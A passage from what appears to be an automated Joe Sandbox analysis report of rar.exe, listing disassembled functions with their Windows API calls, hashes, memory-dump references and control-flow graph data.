                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                      • String ID: rarlng.dll
                                                                                                                                                                      • API String ID: 2520153904-1675521814
                                                                                                                                                                      • Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                      • Instruction ID: 65acf57751b2f7a8a46ff1c52bb82b8c8818dab9723633284f8e18d980e3f094
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                      • Instruction Fuzzy Hash: A531943371864285FF649B21E8443E83364FB64785F424035F98D83698EFBED9A5CB0A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7546EC Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF6EE754620,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE754736
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF6EE754620,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE75476B
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,00007FF6EE754620,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE75477A
                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF6EE754620,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE7547A4
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,00007FF6EE754620,?,00000000,?,00007FF6EE777A8C), ref: 00007FF6EE7547B2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 869497890-0
                                                                                                                                                                      • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                      • Instruction ID: a1b646f3217c91f74d21b73097d316080388608e16bb140c2a9d64953b45d7db
                                                                                                                                                                      • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                      • Instruction Fuzzy Hash: 6141B03360868156EF249B25E4403E863A0FB697B4F010735FA7D832C5EFADE1A8C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE74901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1815803762-0
                                                                                                                                                                      • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                      • Instruction ID: 60c82ed251d4b31ca502e16a7ae0d9d7dd6bc104c98305d8117e7ae9828af31b
                                                                                                                                                                      • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                      • Instruction Fuzzy Hash: 71016226B4865182EB108B16F44433AA762EBD4FD0F198431EE4D83768CFBED956C705
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE78B0E0 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 59578552-0
                                                                                                                                                                      • Opcode ID: 1e255eaa320fee0010fb313d8f9fe48372c1eaef3e81e1b8682bab5b00697f51
                                                                                                                                                                      • Instruction ID: 7e9f161c24704196ace3efa968306d8e82fd3fff9c8d1cffa4dd3854199ab128
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e255eaa320fee0010fb313d8f9fe48372c1eaef3e81e1b8682bab5b00697f51
                                                                                                                                                                      • Instruction Fuzzy Hash: 2FE01232E1E08382EF1836A588962B814911F68320F630235F118C12C2EE9F60F28A1F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE73B540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Char
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 751630497-0
                                                                                                                                                                      • Opcode ID: 186ef3fc3377d62e9400f60c1346a6d63701ca899d0dd8cde323f7fd028d12cd
                                                                                                                                                                      • Instruction ID: e0677a6d7566b3f2ffe1c2adf006fbd7b03d9d3faf2a78bac12808edf7be2332
                                                                                                                                                                      • Opcode Fuzzy Hash: 186ef3fc3377d62e9400f60c1346a6d63701ca899d0dd8cde323f7fd028d12cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 7022E233A0868296EB50DF30D4442FE7BA0FB60748F494032EA8D87699DFB9E961C755
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE75AE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e63de1587b23c38c21d4011fcacfed10454f52ca1ed5247f9ca354383f4c6a53
                                                                                                                                                                      • Instruction ID: 442473f88d6251d8019fa4cc1b561e017b053f1b46cb69dfd8ddcc7b8688c558
                                                                                                                                                                      • Opcode Fuzzy Hash: e63de1587b23c38c21d4011fcacfed10454f52ca1ed5247f9ca354383f4c6a53
                                                                                                                                                                      • Instruction Fuzzy Hash: 55712533A0568186DB44DF29E4053EC3391F798B94F054135EB9CCB399DFB9A062C799
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE773EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 635 7ff6ee773ea8-7ff6ee773f03 call 7ff6ee78a5a0 call 7ff6ee78c8a0 640 7ff6ee773f05-7ff6ee773f3e GetModuleFileNameW call 7ff6ee764e14 call 7ff6ee77a9c0 635->640 641 7ff6ee773f40-7ff6ee773f50 call 7ff6ee77a9e8 635->641 644 7ff6ee773f55-7ff6ee773f79 call 7ff6ee751874 call 7ff6ee751e80 640->644 641->644 652 7ff6ee774692-7ff6ee7746c5 call 7ff6ee7518ac call 7ff6ee78a610 644->652 653 7ff6ee773f7f-7ff6ee773f89 644->653 655 7ff6ee773f8b-7ff6ee773fac call 7ff6ee7711c0 * 2 653->655 656 7ff6ee773fae-7ff6ee773feb call 7ff6ee78ec70 * 2 653->656 655->656 668 7ff6ee773fef-7ff6ee773ff3 656->668 669 7ff6ee773ff9-7ff6ee77402d call 7ff6ee752440 call 7ff6ee752150 668->669 670 7ff6ee7740f2-7ff6ee774112 call 7ff6ee7522e0 call 7ff6ee78eb90 668->670 680 7ff6ee7740bc-7ff6ee7740e2 call 7ff6ee7522e0 669->680 681 7ff6ee774033 669->681 670->652 679 7ff6ee774118-7ff6ee774131 call 7ff6ee752150 670->679 691 7ff6ee774138-7ff6ee77414b call 7ff6ee78eb90 679->691 692 7ff6ee774133-7ff6ee774136 679->692 680->668 694 7ff6ee7740e8-7ff6ee7740ec 680->694 683 7ff6ee77403a-7ff6ee77403e 681->683 686 7ff6ee774064-7ff6ee774069 683->686 687 7ff6ee774040-7ff6ee774044 683->687 689 7ff6ee77406b-7ff6ee774070 686->689 690 7ff6ee774097-7ff6ee77409f 686->690 687->686 693 7ff6ee774046-7ff6ee77405e call 7ff6ee792290 687->693 689->690 695 7ff6ee774072-7ff6ee774078 689->695 696 7ff6ee7740b7 690->696 697 7ff6ee7740a1 690->697 691->652 708 7ff6ee774151-7ff6ee77416c call 7ff6ee77d54c call 7ff6ee78eb88 691->708 698 7ff6ee77416f-7ff6ee7741b1 call 7ff6ee77a900 call 7ff6ee78eb90 692->698 709 7ff6ee7740a3-7ff6ee7740a7 693->709 710 7ff6ee774060 693->710 694->652 694->670 702 7ff6ee77407a-7ff6ee774091 call 7ff6ee791700 695->702 703 7ff6ee774093 695->703 696->680 697->683 717 7ff6ee7741b3-7ff6ee7741bb call 7ff6ee78eb88 698->717 718 7ff6ee7741c0-7ff6ee7741d5 698->718 702->703 715 7ff6ee7740a9-7ff6ee7740b5 702->715 703->690 708->698 709->696 710->686 715->680 717->652 722 7ff6ee7741db 718->722 723 7ff6ee7745f0-7ff6ee774624 call 7ff6ee773884 call 7ff6ee78eb88 * 2 718->723 726 7ff6ee7741e1-7ff6ee7741ee 722->726 759 7ff6ee77464a-7ff6ee774691 call 7ff6ee78ec70 * 2 723->759 760 7ff6ee774626-7ff6ee774648 call 7ff6ee7711c0 * 2 723->760 728 7ff6ee774508-7ff6ee774513 726->728 729 7ff6ee7741f4-7ff6ee7741fa 726->729 728->723 731 7ff6ee774519-7ff6ee774523 728->731 732 7ff6ee7741fc-7ff6ee774202 729->732 733 7ff6ee774208-7ff6ee77420e 729->733 735 7ff6ee774585-7ff6ee774589 731->735 736 7ff6ee774525-7ff6ee77452b 731->736 732->728 732->733 737 7ff6ee774214-7ff6ee77425c 733->737 738 7ff6ee7743d0-7ff6ee7743e0 call 7ff6ee77a580 733->738 741 7ff6ee77458b-7ff6ee77458f 735->741 742 7ff6ee7745a3-7ff6ee7745d4 call 7ff6ee773884 735->742 744 7ff6ee7745db-7ff6ee7745de 736->744 745 7ff6ee774531-7ff6ee774539 736->745 739 7ff6ee774261-7ff6ee774264 737->739 755 7ff6ee7743e6-7ff6ee774414 call 7ff6ee77a9e8 call 7ff6ee79172c 738->755 756 7ff6ee7744f0-7ff6ee774503 738->756 747 7ff6ee774268-7ff6ee774270 739->747 741->742 749 7ff6ee774591-7ff6ee774597 741->749 742->744 744->723 746 7ff6ee7745e0-7ff6ee7745e5 744->746 752 7ff6ee77453b-7ff6ee77453e 745->752 753 7ff6ee774573-7ff6ee77457a 745->753 746->726 747->747 754 7ff6ee774272-7ff6ee774288 call 7ff6ee791700 747->754 749->744 758 7ff6ee774599-7ff6ee7745a1 749->758 762 7ff6ee77456a-7ff6ee774571 752->762 763 7ff6ee774540-7ff6ee774543 752->763 757 7ff6ee77457e-7ff6ee774583 753->757 778 7ff6ee77428a-7ff6ee774295 754->778 779 7ff6ee7742a3 754->779 755->756 787 7ff6ee77441a-7ff6ee7744a9 call 7ff6ee77d840 call 7ff6ee77a900 call 7ff6ee77a8c4 call 7ff6ee77a900 call 7ff6ee7915fc 755->787 756->728 757->744 758->744 759->652 760->759 762->757 768 7ff6ee774545-7ff6ee774548 763->768 769 7ff6ee774561-7ff6ee774568 763->769 770 7ff6ee77454a-7ff6ee77454d 768->770 771 7ff6ee774558-7ff6ee77455f 768->771 769->757 770->749 776 7ff6ee77454f-7ff6ee774556 770->776 771->757 776->757 778->779 783 7ff6ee774297-7ff6ee7742a1 778->783 785 7ff6ee7742a7-7ff6ee7742be 779->785 783->785 785->739 788 7ff6ee7742c0-7ff6ee7742c2 785->788 821 7ff6ee7744ab-7ff6ee7744bb 787->821 822 7ff6ee7744bf-7ff6ee7744cf 787->822 790 7ff6ee7742e6 788->790 791 7ff6ee7742c4-7ff6ee7742d6 call 7ff6ee77a900 788->791 790->738 794 7ff6ee7742ec 790->794 796 7ff6ee7742db-7ff6ee7742e1 791->796 797 7ff6ee7742f1-7ff6ee7742f7 794->797 801 7ff6ee7745d6 796->801 798 7ff6ee7742f9-7ff6ee7742fe 797->798 799 7ff6ee774300-7ff6ee774303 797->799 798->799 802 7ff6ee774305-7ff6ee774314 798->802 799->797 801->744 804 7ff6ee77433d-7ff6ee774347 802->804 805 7ff6ee774316-7ff6ee774320 802->805 808 7ff6ee77434d-7ff6ee774378 call 7ff6ee77d840 804->808 809 7ff6ee7745ea-7ff6ee7745ef call 7ff6ee78a774 804->809 807 7ff6ee774323-7ff6ee774327 805->807 807->804 813 7ff6ee774329-7ff6ee77433b 807->813 819 7ff6ee77437a-7ff6ee774399 call 7ff6ee791764 808->819 820 7ff6ee77439e-7ff6ee7743cb call 7ff6ee77470c 808->820 809->723 813->804 813->807 819->796 820->796 821->822 825 7ff6ee7744d2-7ff6ee7744d8 822->825 828 7ff6ee7744da-7ff6ee7744e5 825->828 829 7ff6ee7744eb-7ff6ee7744ee 825->829 828->801 828->829 829->825
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                      • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                      • API String ID: 602362809-1645646101
                                                                                                                                                                      • Opcode ID: a090c3fb5f13b25c423c6cb206785e87dc2f8f8472672048dfb234bb33d1bd14
                                                                                                                                                                      • Instruction ID: 6afa401847af0ac696359900c8ab7e87bedfead65d8ccd19709b25516d5a8a79
                                                                                                                                                                      • Opcode Fuzzy Hash: a090c3fb5f13b25c423c6cb206785e87dc2f8f8472672048dfb234bb33d1bd14
                                                                                                                                                                      • Instruction Fuzzy Hash: 2422F523A1868294EF20DB15D4403B92361FF60785F824135FA5EC76D5EFBEE9A4C70A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE744FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1405 7ff6ee744fd0-7ff6ee74502d call 7ff6ee78a5a0 1408 7ff6ee74504d-7ff6ee745055 1405->1408 1409 7ff6ee74502f-7ff6ee745037 1405->1409 1411 7ff6ee745057-7ff6ee745069 call 7ff6ee74481c 1408->1411 1412 7ff6ee74506e-7ff6ee745089 call 7ff6ee76420c 1408->1412 1409->1408 1410 7ff6ee745039-7ff6ee74504b call 7ff6ee78c8a0 1409->1410 1410->1408 1410->1411 1411->1412 1418 7ff6ee74508b-7ff6ee74509d call 7ff6ee77a9c0 1412->1418 1419 7ff6ee74509f-7ff6ee7450b6 call 7ff6ee77db08 1412->1419 1424 7ff6ee74511b-7ff6ee745131 call 7ff6ee78c8a0 1418->1424 1419->1424 1425 7ff6ee7450b8-7ff6ee7450c3 call 7ff6ee77a59c 1419->1425 1430 7ff6ee745137-7ff6ee74513e 1424->1430 1431 7ff6ee745203-7ff6ee74520d call 7ff6ee77aa48 1424->1431 1425->1424 1432 7ff6ee7450c5-7ff6ee7450cf call 7ff6ee753054 1425->1432 1434 7ff6ee74516c-7ff6ee7451be call 7ff6ee77aa1c call 7ff6ee77aa48 call 7ff6ee776e98 1430->1434 1435 7ff6ee745140-7ff6ee745167 call 7ff6ee763f98 1430->1435 1437 7ff6ee745212-7ff6ee74521c 1431->1437 1432->1424 1444 7ff6ee7450d1-7ff6ee745107 call 7ff6ee77a9e8 call 7ff6ee77a9c0 call 7ff6ee753054 1432->1444 1491 7ff6ee7451d3-7ff6ee7451e8 call 7ff6ee777a24 1434->1491 1435->1434 1442 7ff6ee7452db-7ff6ee7452e0 1437->1442 1443 7ff6ee745222 1437->1443 1449 7ff6ee7452e6-7ff6ee7452e9 1442->1449 1450 7ff6ee745453-7ff6ee745477 call 7ff6ee74f00c call 7ff6ee74f230 call 7ff6ee74f09c 1442->1450 1447 7ff6ee745228-7ff6ee74522d 1443->1447 1448 7ff6ee74532f-7ff6ee745332 1443->1448 1444->1424 1519 7ff6ee745109-7ff6ee745116 call 7ff6ee77a9e8 1444->1519 1447->1448 1455 7ff6ee745233-7ff6ee745236 1447->1455 1457 7ff6ee74533b-7ff6ee74533e 1448->1457 1458 7ff6ee745334 1448->1458 1451 7ff6ee745379-7ff6ee745382 1449->1451 1452 7ff6ee7452ef-7ff6ee7452f2 1449->1452 1510 7ff6ee74547c-7ff6ee745483 1450->1510 1465 7ff6ee745449-7ff6ee745451 call 7ff6ee76eab8 1451->1465 1466 7ff6ee745388-7ff6ee74538b 1451->1466 1459 7ff6ee74536c-7ff6ee745374 call 7ff6ee7781cc 1452->1459 1460 7ff6ee7452f4-7ff6ee7452f7 1452->1460 1463 7ff6ee745238-7ff6ee74523b 1455->1463 1464 7ff6ee745290-7ff6ee745299 1455->1464 1468 7ff6ee745347-7ff6ee745358 call 7ff6ee731230 call 7ff6ee734858 1457->1468 1469 7ff6ee745340 1457->1469 1458->1457 1459->1510 1460->1450 1471 7ff6ee7452fd-7ff6ee745300 1460->1471 1476 7ff6ee74523d-7ff6ee745240 1463->1476 1477 7ff6ee745274-7ff6ee74528b call 7ff6ee731230 call 7ff6ee7348ec 1463->1477 1473 7ff6ee74529b-7ff6ee74529e 1464->1473 1474 7ff6ee7452b2-7ff6ee7452bd 1464->1474 1465->1510 1480 7ff6ee74541b-7ff6ee745433 call 7ff6ee77ab1c 1466->1480 1481 7ff6ee745391-7ff6ee745397 1466->1481 1526 7ff6ee74535d 1468->1526 1469->1468 1471->1448 1483 7ff6ee745302-7ff6ee745305 1471->1483 1489 7ff6ee7452a0-7ff6ee7452a6 1473->1489 1490 7ff6ee7452ce-7ff6ee7452d6 call 7ff6ee7655e0 1473->1490 1474->1490 1492 7ff6ee7452bf-7ff6ee7452c9 call 7ff6ee77a9e8 1474->1492 1476->1450 1485 7ff6ee745246-7ff6ee745249 1476->1485 1542 7ff6ee74535e-7ff6ee745362 call 7ff6ee7314fc 1477->1542 1480->1510 1527 7ff6ee745435-7ff6ee745447 call 7ff6ee76bbd4 1480->1527 1495 7ff6ee745399-7ff6ee74539c 1481->1495 1496 7ff6ee74540c-7ff6ee745419 call 7ff6ee7654f8 call 7ff6ee7651e4 1481->1496 1498 7ff6ee745307-7ff6ee74530a 1483->1498 1499 7ff6ee745322-7ff6ee74532a call 7ff6ee7567e0 1483->1499 1485->1448 1501 7ff6ee74524f-7ff6ee745252 1485->1501 1506 7ff6ee7452a8-7ff6ee7452ad call 7ff6ee747214 1489->1506 1507 7ff6ee745313-7ff6ee74531d call 7ff6ee74481c 1489->1507 1490->1510 1545 7ff6ee7451ea-7ff6ee745201 call 7ff6ee776f68 call 7ff6ee7314c0 1491->1545 1546 7ff6ee7451c0-7ff6ee7451ce call 7ff6ee77aa48 1491->1546 1492->1490 1512 7ff6ee7453ef-7ff6ee745401 call 7ff6ee7445c8 1495->1512 1513 7ff6ee74539e-7ff6ee7453a1 1495->1513 1496->1510 1498->1450 1518 7ff6ee745310 1498->1518 1499->1510 1501->1450 1521 7ff6ee745258-7ff6ee74525b 1501->1521 1506->1510 1507->1510 1516 7ff6ee745491-7ff6ee7454bc call 7ff6ee78a610 1510->1516 1517 